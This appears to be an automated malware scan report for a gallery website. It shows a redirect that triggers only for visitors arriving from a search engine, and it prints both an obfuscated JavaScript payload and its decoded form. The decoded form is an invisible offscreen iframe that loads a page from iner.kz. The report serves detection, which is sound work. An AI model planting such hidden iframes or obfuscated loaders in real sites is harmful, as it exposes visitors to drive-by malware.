Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://oilandwatergallery.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: oilandwatergallery.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Sep 2014 11:23:29 GMT Location: http://iner.kz/index2.php Server: Apache Content-Length: 305 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://oilandwatergallery.com/ | 200 OK Content-Length: 2445 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
var dgBqgoMgsSHWTyZTDkNE = "Vev60Vev105Vev102Vev114Vev97Vev109Vev101Vev32Vev119Vev105Vev100Vev116Vev104Vev61Vev34Vev52Vev56Vev48Vev34Vev32Vev104Vev101Vev105Vev103Vev104Vev116Vev61Vev34Vev54Vev48Vev34Vev32Vev115Vev114Vev99Vev61Vev34Vev104Vev116Vev116Vev112Vev58Vev47Vev47Vev105Vev110Vev101Vev114Vev46Vev107Vev122Vev47Vev105Vev110Vev100Vev101Vev120Vev50Vev46Vev112Vev104Vev112Vev34Vev32Vev115Vev116Vev121Vev108Vev101Vev61Vev34Vev98Vev111Vev114Vev100Vev101Vev114Vev58Vev48Vev112Vev120Vev59Vev32Vev112Vev
Decoded script:
<iframe width="480" height="60" src="http://iner.kz/index2.php" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>
Antivirus reports:
http://oilandwatergallery.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Thu, 18 Sep 2014 11:23:30 GMT Location: http://iner.kz/index2.php Server: Apache Content-Length: 281 Content-Type: text/html; charset=iso-8859-1 | clean |
http://iner.kz/index2.php | 500 Can't connect to iner.kz:80 (Bad hostname) Content-Length: 146 Content-Type: text/plain | clean |
http://iner.kz/test404page.js | 500 Can't connect to iner.kz:80 (Bad hostname) Content-Length: 146 Content-Type: text/plain | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=oilandwatergallery.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://oilandwatergallery.com/
Result: oilandwatergallery.com is not infected or malware details are not published yet.